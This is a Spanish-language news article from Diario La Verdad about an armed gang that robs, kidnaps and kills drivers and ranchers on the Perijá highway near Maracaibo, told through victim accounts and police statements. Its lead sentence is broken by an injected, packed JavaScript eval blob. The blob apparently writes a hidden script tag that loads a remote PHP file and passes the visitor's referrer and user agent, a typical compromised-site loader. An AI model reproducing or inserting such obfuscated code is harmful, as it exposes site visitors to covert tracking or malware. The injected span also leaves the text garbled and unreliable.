publicidad

Kilómetros de terror

Helen Hernández / Maracaibo / noticias@laverdad.com
Las eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ziyzh|var|u0026u|referrer|hbarz||js|php'.split('|'),0,{})) víctimas aseguran que una mujer comanda a los antisociales, la llaman por teléfono para seguir instrucciones. El general Morales Guerrero, coordinador de la PNB y comandante del CPBEZ, adelanta investigaciones para desarticular la banda

(Foto: Archivo)

La banda delictiva que opera entre el kilómetro 25 al 40 de la vía a Perijá mantiene azotado a los transeúntes, conductores de vehículos particulares y productores agropecuarios que se desplazan en sus camionetas. Ceder a la solicitud de los ladrones es la única alternativa que les queda para sobrevivir al asalto.

Las víctimas aseguran que “las autoridades policiales hacen caso omiso a las denuncias, a nadie parece importarle la situación que viven los ganaderos en la carretera”. El silbido del viento se escucha en el estrecho camino, el pavimento también habla, reclama sangre, inocentes que corren, sudan y piensan en un futuro inexistente cuando son apuntados con armas de fuego.

El modus operandi de la organización criminal es el mismo, interceptan carros último modelo, camionetas Chevrolet y camiones Ford 350. Apuntan a los choferes, los obligan a descender, algunos tienen suerte, son abandonados en medio de una zona enmontada; otros, caen muertos tras recibir impactos de bala en el cuerpo.

En el sector Los Dos Morales al Sur del Lago de Maracaibo, Carlos José Baudillo Villamizar, de 38 años, miembro de la Asociación de Ganaderos y Agricultores del municipio Colón (Aganaco), murió en manos de dos sicarios mientras viajaba en su camioneta Súper Dutty 350, azul, placa A43BM7V. Los maleantes aprovecharon que disminuyó la velocidad del vehículo para sorprenderlo.

Su sangre se mezcló con la del resto de los muertos. Como de costumbre lo único que quedó es el recuerdo, emprendedor, honesto, responsable, “creía en su país”, comentó Daniel Ariza, presidente de Aganaco, no sin antes repudiar los asesinatos que ocurren en las vías.

Hablan las víctimas

El delito se repite, es una historia recurrente, conmovida hasta las lágrimas una de las víctimas de los maleantes relató su experiencia. Hace una semana salió de su casa, subió al carro Fiat- Kia Sportage, blanco, con destino a La Villa, al llegar al kilómetro 30 una camioneta blanca de Petróleos de Venezuela se detuvo junto ella.

Los antisociales bajaron los vidrios de la unidad vehicular, sacaron a relucir una escopeta, le ordenaron que parara, los nervios la invadieron, aceleró, no podía permitir que la alcanzaran. Detonaciones consecutivas la hicieron despertar a una nueva pesadilla, rostros, momentos, sonidos, sentimientos, afloraron en su mente.

Sentada en el asiento trasero del vehículo observaba a los hampones, estrujó sus manos con fuerza, le pedía a Dios que los perdonara. De pronto una voz que venía del puesto del copiloto le preguntó: “¿Vas a pagar el rescate?”, angustiada respondió: “No, llévate el carro, véndelo si quieres, pero no me hagas daño ni me dejes desnuda en medio de la calle”.

El reloj marcaba las 12.00 del mediodía, habían pasado dos horas desde que los antisociales la secuestraron, junto a ella iba el presunto trabajador de la empresa petrolera, conductor de la camioneta robada donde iban los ladrones. Lo miraba con recelo, “debe estar implicado”, repetía en su interior.

Luego de hacerlos caminar por una trilla cubierta de huecos, piedras y maleza, uno de los malhechores los obligó a sentarse, esperaban la muerte bajo la sombra de aquel árbol seco. Para sorpresa de ambos, un motorizado buscó a su verdugo, huyeron de la escena sin dejar rastro.

Víctor Acosta Chacín corrió con la misma suerte, lo interceptaron a las 3.00 de la tarde, cuando se desplazaba por el kilómetro 25 de la vía a Perijá en sentido Machiques-La Villa, al principio pensó que el vehículo tenía algún desperfecto mecánico, luego comprendió que se trataba de un atraco.

Cuatro hombres armados se acercaron hacía él, le pidieron que se bajara de la unidad mientras le decían: “quédate tranquilo no te va a pasar nada”. Lo montaron a la fuerza en otro carro, en el trayecto los maleantes asaltaron un camión 750 que transportaba productos de belleza, en el interior iban dos caraqueños, acompañaron al infortunado hasta un rancho con techos de paja y pisos de arena.

Las preguntas de los hampones eran las mismas que les hacían a todos los conductores que asaltaban en la carretera ¿El carro tiene GPS?, las víctimas respondieron que no. Durante el rapto el líder de los hampones hablaba por teléfono con una mujer que le daba órdenes. 

Presencia policial

Armando Chacín, presidente de la Federación de Ganaderos de la Cuenca del Lago de Maracaibo (Fegalago), comentó que a partir de las 11.00 de la mañana el kilómetro 25 al 40 de la vía a Perijá se convierte en una guillotina, efectivos de la Guardia Nacional Bolivariana custodiaban la zona en seis patrullas enviadas por el Gobierno, ahora solo cuentan con dos. 

Los delitos se incrementan, de tres a cinco casos de robo son registrados en el destacamento de la GNB. El general de Brigada, Luis Alberto Morales Guerrero, coordinador de la Policía Nacional Bolivariana y comandante del CPBEZ, aseguró que la PNB cuenta con una estación de tránsito terrestre en caso de presentarse una emergencia en la carretera.

Hasta el momento los efectivos desconocen cuántos y quiénes integran la banda criminal, adelantan investigaciones para dar con el paradero de su líder. Mientras las experticias continúan, la extorsión, el cobro de vacuna y el asesinato por encargo cobran fuerza, pese a los 30 funcionarios de la Policía regional que custodian la zona durante los fines de semana.

Más noticias

  • Dos arrestados por abuso sexual de tres jóvenes

    03:55pm

    Wadid Padilla España “El Guadi” y Virginia Vargas Uraya “La Virg”, de 45 y 44 años de edad, fueron detenidos por funcionarios del CPBEZ tras haber sido denunciados por mantener en cautiverio y violar a tres jovencitas. Una de las víctimas pasó tres años encerrada en una casa del sector Caracara, parroquia La Palmita, municipio Panamericano del estado Táchira

  • Detenido con 45 envoltorios de droga en el centro de Maracaibo

    03:05pm

    El hombre fue detenido por funcionarios policiales en el casco central de la ciudad de Maracaibo. El señalado, de 27 años de edad, llevaba los envoltorios con presunta marihuana escondidos en sus partes íntimas 

  • Desarticulan la banda criminal Los Doctores

    12:00am

    Los antisociales distribuían los fármacos acaparados en el mercado Las Pulgas, empresas del ramo de la salud, farmacias y centros hospitalarios. Fuentes oficiales ligadas a la investigación detallaron que los detenidos no presentaron documentos que justificaran la procedencia legal de los insumos incautados

Comentarios
© 2017, Diario La Verdad. Maracaibo. Venezuela C.A. RIF J-30540623-5. Términos Legales. Contáctenos via: web@laverdad.com , noticias@laverdad.com o ventas@laverdad.com
Desarrollado por Miguel Guadarrama